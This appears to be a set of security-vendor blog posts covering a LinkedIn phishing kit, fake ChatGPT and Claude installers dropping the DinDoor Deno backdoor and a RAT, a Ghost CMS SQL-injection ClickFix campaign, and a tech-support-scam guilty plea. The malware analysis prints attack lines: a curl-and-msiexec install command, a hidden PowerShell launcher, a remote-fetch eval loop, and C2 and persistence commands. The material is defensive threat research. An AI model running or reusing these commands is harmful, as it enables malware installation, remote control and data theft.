• Disable advertising IDs on your smartphones, tablets, and computers through your device settings where possible.
• Use a VPN to hide your IP address and encrypt your browsing traffic, install ad and tracking blockers, and consider using more privacy-focused browsers.

Still wondering if your phone is listening to you?

We looked into this very topic on our Lock and Code podcast. Listen to it below, or search for it on your favorite podcast player.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

Cybercriminals are abusing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward.

The phishing email masquerades as a business inquiry designed to look like it’s come via LinkedIn and includes a fake “contract” attachment. But it contains a number of red flags:

• The sender name, email address, and email signature don’t match
• The sender company exists, but not in the US
• The sender name exists, but not at that company
• The attachment has a double file extension: pdf.html

“I would like to do business with you via LinkedIn. I’m a buyer.

Please find attached the signed contract No. #33110:12000pcs.

I look forward to hearing from you. “

Scam or legit? Scam Guard knows.

TRY IT NOW

Double file extensions are often used to mislead recipients into thinking a file is something other than what it really is. The attached HTML file is highly obfuscated. Basically, it’s a one-line JavaScript.

The script uses two common obfuscation methods: URL encoding and Base64 . The script is divided into two Base64-encoded sections.

When you open the attachment, you’ll find a simple login form.

The target’s email address is hardcoded, and you’re unable to change or remove it. Possibly because some researchers have no qualms about flooding the receiving channel with false credentials.

But figuring out the receiving channel is where it gets interesting. Network analysis reveals this URL:

https://lnkd.tt.omtrdc.net/rest/v1/delivery

This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform. But the campaign isn’t using Adobe Target to receive the phished credentials. Instead, attackers are abusing Adobe Target as a redirect/abuse point in the phishing flow. Most likely to track victims who fell for the phishing email.

In the end, it redirects the target to the legitimate business.linkedin.com site to reduce any suspicion the target may still have.

After deobfuscating the scripts, we found the destination for the submitted credentials:

All in all, even with the level of obfuscation, the method is very raw and simple:

POST to: http://a1263367.xsph.ru/taam/Ln.php

With data:

• AA = hardcoded email address
• BB = whatever password the user entered

The PHP file hosted on a .ru domain handles the redirect to LinkedIn, making the victim think they just logged in successfully.

How to stay safe

The good news: Once you know what to look for, these attacks are much easier to spot and block. The bad news: They’re cheap, scalable, and likely to keep circulating.

So, the next time a “PDF” asks for your password in a browser, pause and think about what might be hiding underneath.

Beyond avoiding unsolicited attachments, here are a few ways to stay safe:

• Only access your accounts through official apps or by typing the official website directly into your browser.
• Check file extensions carefully. Even if a file looks like a PDF, it may not be.
• Enable multi-factor authentication for your critical accounts.
• Use an up-to-date, real-time anti-malware solution with a web protection module.

Pro tip: Malwarebytes Scam Guard recognized this email as a scam.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing a Deno backdoor known as DinDoor. Attackers are using compromised YouTube channels to distribute links to these platforms. 

DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime.  

Attackers are increasingly abusing alternative JavaScript runtimes like Bun and Deno to bypass traditional detection methods. In one of our recent investigations we documented how attackers are using Bun as an initial infection vector to distribute NWHStealer. And in March, ThreatDown researchers also observed attackers using Deno to deliver CastleLoader through a multi-stage infection chain involving the ClickFix lure.  

These campaigns use Scoop (an alternative installer for Windows) and WinGet (the official Windows package manager) to install Deno on the victim’s machine. They then use the Deno runtime to execute a RAT capable of executing additional payloads, exfiltrating data from browsers, wallets, and other applications, which has an interesting peer-to-peer feature that uses Edge to hide malicious traffic. 

Legitimate platforms abused to spread malware

The infection chain is usually started via MSI files or PowerShell scripts downloaded from GitHub or SourceForge in most of the analyzed cases. Users are usually redirected to these malicious repositories via compromised YouTube channels. These videos currently total more than 50,000 views. 

Compromised YouTube channels with AI-generated videos 

The compromised YouTube channels create posts promoting different software and constantly switch between GitHub accounts to distribute the malware. 

YouTube posts linking to the malicious GitHub repositories

The fake software appears designed to target creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools, cracked software, or community-distributed installers from sites like GitHub and SourceForge. We’ve observed fake MSIs and scripts masquerading as installers and plugins for legitimate software and brands such as ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, Kontakt. 

GitHub repository for fake ChatGPT installer 

The malicious repositories have a command for both Windows and macOS. These repositories ask users to open the terminal and copy a malicious command, which downloads and executes the MSI from GitHub. 

Fake plugin that asks the user to copy and execute the malicious command 

Malicious GitHub accounts create multiple repositories filled with fake software and plugins related to popular software to lure in more users. 

GitHub account with different malicious repositories

We found that the same backdoor was distributed through SourceForge, mimicking a legitimate game software called GearUP and an AI watermark remover software called BWR. 

The malicious MSI files hosted on SourceForge How to stay safe  

The attackers relied heavily on trust. GitHub and SourceForge are legitimate platforms, which makes fake projects look more convincing. We contacted GitHub, which quickly removed the malicious repositories, but users should expect new ones to continue appearing.

Here are  a few simple ways to stay safe:  

• Only download software from official vendor websites.  
• Be skeptical of “free”, cracked, or unofficial versions of paid software. 
• Be cautious with downloads from GitHub, SourceForge, forums, or file-sharing sites, especially from new or unknown accounts. 
• Attackers continue to create new profiles to distribute this malware across platforms.  Check the developer or publisher’s profile, its reputation, and how recently it was created before downloading anything. 
• Check that archive contents, images, and text files align with what you expected to download. Archive names and structures often follow recognizable malicious patterns.  
• Check the file’s publisher and digital signature before you run it. Windows, you can usually check this by right-clicking the file, selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag. 

Technical analysis 

The malicious GitHub repositories ask the user to open cmd and execute a malicious command. The malicious commands download an MSI from GitHub and install it via msiexec. These repositories sometimes also contain PowerShell scripts to similarly initiate the infection chain. 

Example of a malicious command hosted on GitHub that starts the infection chain: 

curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi 

The MSI drops a CMD file and a PowerShell script in a random directory specified in the MSI InstallationFolder and registry values. We detected different structures for these MSIs, with JavaScript instead of the CMD file, or with additional embedded files.

The “Ps1File” and “CmdFile” inside the MSI dropper

The CMD file executes the PowerShell script, with a name that changes in the analyzed infection chains: 

@set "SCRIPTDIR=%~dp0" @powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden" 

The executed PowerShell script

The PowerShell script takes care of: 

• Ensuring the package manager Scoop is installed, and installing it if missing with the official script from get.scoop.sh. Scoop is a popular, open-source command-line software installer and package manager for Microsoft Windows. 
• Using Scoop to install WinGet (Windows Package Manager) if missing.  
• Installs Deno (a JavaScript/TypeScript runtime) via WinGet or Scoop if not present.

The usage of the package managers Scoop and WinGet to install additional software on the compromised machine is an interesting approach that gives the attacker more flexibility. 

Command executed to install Deno using WinGet: 

"C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent The DinDoor Backdoor 

Next, the following stage is executed with the downloaded Deno executable: 

"C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js

The returned code (the internal name is “launcher-1”) is a small eval-loop function that downloads the next stage (the internal name is “launcher-2”). The downloaded backdoor is publicly known as DinDoor. 

var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))}

The backdoor handles persistence, sends information about the compromised system to the command-and-control server (C2), and executes additional payloads and commands returned by the C2.  The HTTP endpoints used for C2 communications vary between the analyzed cases.  

The backdoor obtains an ID from an HTTP endpoint (for example, /security-pool) and then uses that ID to obtain the next stage from /v2{ID}.js.   

The obtained stage is executed via stdin without being written to disk, using the command: 

deno run -A --no-check –

To achieve persistence, the backdoor runs a PowerShell command to create a RUN key that executes the downloader “launcher-1” used previously: 

conhost.exe --headless "<deno.exe>" -A "%APPDATA%\<hash>.js

This backdoor distributes several malware families in the analyzed cases. In this blog, we analyze one of the distributed payloads: a RAT that uses the Deno JavaScript runtime. 

Deno RAT 

The delivered RAT, like the other analyzed scripts, uses the Deno JavaScript environment and has full functionality to control the device, execute commands and payloads, and exfiltrate various types of data through its built-in stealer module.  

We did not find a specific name or attribution for this RAT. In the past, the RAT has been referred to as “Smokest” based on a specific value in the config. The similar commenting style and shared infrastructure suggest that the DinDoor developer and the RAT developer may be the same person or team. 

Picked up something you shouldn’t have?

RUN A FREE VIRUS SCAN

In addition to HTTP for C2 communication, the RAT also supports WebSocket communication, enabled when the JSON value isLiveEnabled returned from the C2 is set to true. 

The main function of the Deno RAT

The RAT supports different commands (exec, exec-ps, exec-sc, sysinfo, screenshot, stealer) and functionality: 

• Collect system information about the compromised device 
• Full bidirectional control through a custom VNC implementation over WebSocket 
• Target more than 50 crypto wallet extensions and 10 crypto software folders such as Atomic Wallet, Exodus, Electrum, and ByteCoin
• Collect data from browsers including Chrome, Chromium, Brave, Edge, Avast Browser, Edge, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, and  Chromodo 
• Exfiltrate Telegram, Discord, and Lightcord data 
• Record and modify clipboard data  
• List folders, files and exfiltrate content from files with specific extensions  
• Capture screenshots using different methods  
• Execute additional payloads  
• Launch or terminate arbitrary processes  
• Execute commands with PowerShell  
• Establish SOCKS5 proxy tunnels over WebSocket 

One of the most interesting parts of the RAT is a peer-to-peer streaming mode that uses the Edge browser to hide traffic and make detection more difficult.

To stream live video directly to the operator without routing it through the C2 server, the RAT spawns a hidden Microsoft Edge process and connects to it via Chrome DevTools Protocol (CDP). It then injects a small WebRTC HTML page into Edge, turning the legitimate browser into a peer-to-peer video relay. The Deno agent captures and H.264-encodes the victim’s screen, passes the frames to the Edge page over CDP, and Edge forwards them directly to the operator’s browser over an encrypted WebRTC DataChannel. SDP and ICE signaling, needed to establish the direct connection, is exchanged through the existing C2 WebSocket. 

The injected HTML page inside Edge browser 

The RAT uses the following endpoints for C2 communication, which can vary between samples: 

• /health: checks the “ok” response from the C2 
• /token: receive config parameters, task delivery, results, and exfiltrated data 
• /vnc/agent/: WebSocket path used for VNC communication 

The config data is Base64-encoded and is sent in communications with the C2 as an authorization token. Decoded config data: 

{    "buildId": "cd361ef3159f5ce9",    "buildNote": "BWR",    "buildType": "msi-v2",    "proxyUrls": ["{C2}"],    "userId": "…",    "accessTokenHash": "…",    "iat": 1779372546,    "exp": 2094948546  }

We found different versions of this RAT, including a “light” version called “agent-lite” that supports only a few commands and uses Cloudflare Workers for C2 communication. 

The “light” version of the RAT

 

Acknowledgements 

• DinDoor: https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis 
• Smokest: https://x.com/vxunderground/status/2013006601133687004 

Indicators of Compromise (IOCs) 

URLs 

• https[:]//github.com/claude-free-plugin/
• https[:]//github.com/ai-gen-profi 
• https[:]//github.com/wharfdemolisherpit 
• https[:]//sourceforge.net/projects/gearup/ 
• https[:]//sourceforge.net/projects/bluewaveremover/

Domains 

• claudescript[.]top: distribution website 
• ms-telemetry-gateway-us[.]com: C2 
• dakatawebstick[.]com: C2 
• ashpaltlonpro[.]com: C2 
• cf-proxy[.]cloud-analytics-services[.]workers.dev: C2 
• agilemast3r[.]duckdns[.]org: C2 
• geralnewlong[.]com: C2 
• hngfbgfbfb[.]cyou: C2 
• logicalnewrestore[.]com: C2

IPs 

• 23[.]227[.]196[.]107: C2 
• 45[.]137[.]99[.]121: C2 
• 31[.]57[.]129[.]23: C2 
• 66[.]78[.]40[.]107: C2 
• 193[.]233[.]198[.]132: C2

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Attackers are abusing a critical Ghost Content Management System (CMS) vulnerability to hijack more than 700 legitimate websites and inject a fake Cloudflare verification step that tricks visitors into running a Windows command that installs malware.

These social engineering campaigns—where website visitors are tricked into running malicious commands on their systems—are commonly known as “ClickFix” attacks. In this case, cybercriminals turned websites belonging to trusted organizations, including universities and tech companies, into delivery platforms for the malware campaign.

More than 700 Ghost‑powered websites were compromised through a known SQL injection vulnerability tracked as CVE‑2026‑26980. The attackers used this bug to steal administrative API keys and silently inject malicious JavaScript into posts and pages across affected sites.

Researchers found that the injected script loads a second‑stage ClickFix flow, presenting visitors with a fake Cloudflare or CAPTCHA verification dialog.

Example of fake Cloudflare verification

Instead of a normal checkbox, the page instructs users to copy‑paste a command into the Windows Run dialog or PowerShell, effectively tricking them into installing malware on their own systems.

Details for website managers

At the heart of this campaign is a critical SQL injection bug in Ghost’s Content API. The researchers noted:

“Without any authentication, an attacker can directly read the database contents through this vulnerability, including the Admin API Key used to call the Ghost Admin API.”

The vulnerability affects Ghost versions 3.24.0 through 6.19.0 and can be exploited without logging in.

A patched version is now available and should be installed as soon as possible. Not just because of the ClickFix campaign; once attackers steal an Admin API key, they can edit, delete, or create posts, inject scripts, hijack themes, and tamper with user‑facing content in other ways.

How to stay safe

This campaign is likely to be particularly effective because the instructions are framed as harmless technical steps such as “verify you’re human,” “fix your connection,” or “continue to the site.” Worse still, the content appears on websites users already trust.

With ClickFix running rampant—and it doesn’t look like it’s going away anytime soon—it’s important to be aware, careful, and protected.

• Slow down. Don’t follow instructions on a webpage without thinking them through, especially if the page asks you to run commands on your device or copy-paste code. Attackers rely on urgency to bypass critical thinking, and many ClickFix pages use countdowns, fake user counters, or other pressure tactics to make you act quickly.
• Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. If a website tells you to execute a command or perform a technical action, check official documentation or contact support before proceeding.
• Be cautious when copy-pasting commands. Attackers often disguise malicious payloads inside clipboard text. Typing commands manually instead of copy-pasting them can reduce the risk of unknowingly running hidden malicious payloads.
• Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
• Stay informed about evolving attack techniques. Cybercriminals constantly adapt their methods, and awareness remains one of your best defenses, so keep reading our blog!

Pro tip: Did you know the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

A pop-up appears on your computer, warning of a virus. You call the “Microsoft technician” in the pop-up message, and they explain that they need remote access to fix it. Most of us know this script by now. It’s a scam, operated by people intent on siphoning money from your account.

A court case last week gave us more insight into how these operations work. Two former executives of call tracking and analytics company C.A. Cloud Attribution Ltd pleaded guilty to selling phone numbers and call infrastructure to tech support scammers. Prosecutors say they even coached their illegitimate customers on how to avoid getting caught.

Adam Young, former CEO, and Harrison Gevirtz, former CSO, ran the company between early 2017 and April 2022. According to the Department of Justice (DOJ), they sold telephone numbers, call recordings, and call-forwarding services to companies in India they knew were running tech support fraud operations. The two are US residents, but C.A. Cloud Attribution was registered in Cyprus.

The scams themselves followed a familiar pattern, using fake pop-ups warning of imaginary infections. Victims were persuaded to call the numbers, where agents impersonated Microsoft and Apple and charged hundreds of dollars for fictitious technical work. In some cases, scam agents would gain access to victims’ systems and obtain personal financial information through remote access.

Willing participants

The two executives didn’t just look the other way. Prosecutors say they advised their fraud clients to rotate through large pools of numbers so complaints wouldn’t get any single account terminated. They also told their own sales staff to pursue businesses they already knew were fraudulent. On occasion, they brokered introductions so fraudsters could buy and sell calls between each other.

To cap it all, the pair also ran a call center of their own in Tunisia from 2016 to April 2022, where some staff allegedly carried out fake tech support scams themselves.

According to FBI Boston Special Agent in Charge Ted E. Docks:

“What the CEO and CSO of this well-known call tracking and analytics company did was downright despicable. By their own admission, they willfully profited from telemarketing and tech support scammers, here and abroad, who preyed on the elderly, exploited the vulnerable, and drained victims of their life savings and peace of mind.”

Young and Gevirtz pleaded guilty to misprision of a felony (concealing knowledge of a crime), which carries a maximum sentence of three years in federal prison and a $250,000 fine. It’s notable that the Feds didn’t get them on wire fraud conspiracy, which carries up to 20 years in the slammer.

C.A. Cloud Attribution isn’t the first infrastructure provider to get caught helping tech support scammers. In 2023, the Federal Trade Commission (FTC) went after payment processor Nexway, alleging the company had been “strongly dependent” on its “premium tech support” clients that accounted for roughly a quarter of its revenue. Visa had already placed Nexway into its Chargeback Monitoring Program in December 2017, but the fraud continued anyway. The FTC originally sought a $49.5 million penalty, later reduced to $650,000.

The next call from “Microsoft”

The pattern is consistent. The scam itself might be loud, with pop-up sirens and fake blue-screen warnings, but the supply chain underneath it often looks dull and corporate. According to court documents, Young and Gevirtz deliberately stopped their details appearing on pop-up tech support alerts so that C.A. Cloud Attribution could keep a low profile.

If a well-known call tracking and analytics company can spend years knowingly routing calls into scam operations and face a maximum sentence of three years, it raises uncomfortable questions about deterrence for the next vendor tempted to look the other way.

Sentencing for both men is scheduled for June 16, 2026.

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

Last week on Malwarebytes Labs:

• Update Chrome now: Critical bugs could let attackers run code
• Microsoft Defender vulnerabilities are being exploited in the wild
• TikTok, YouTube, and Roblox face scrutiny, but age gates won’t fix child safety
• Catch spyware in the act with Windows Webcam Monitoring
• Researchers left AI agents alone in a virtual town and watched it all unravel
• Fake malware-signing service Fox Tempest dismantled by Microsoft
• Firefox 151 packs big privacy upgrades into a small update
• Biometrics, diagnoses, and bank details exposed in major healthcare breach
• Facebook scam promises cheap Aldi meat boxes, steals payment info instead
• YouTube wants your face to fight deepfakes
• Microsoft is changing Edge’s plaintext password behavior
• AI is distorting the Holocaust (Lock and Code S07E10)

Stay safe!

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free →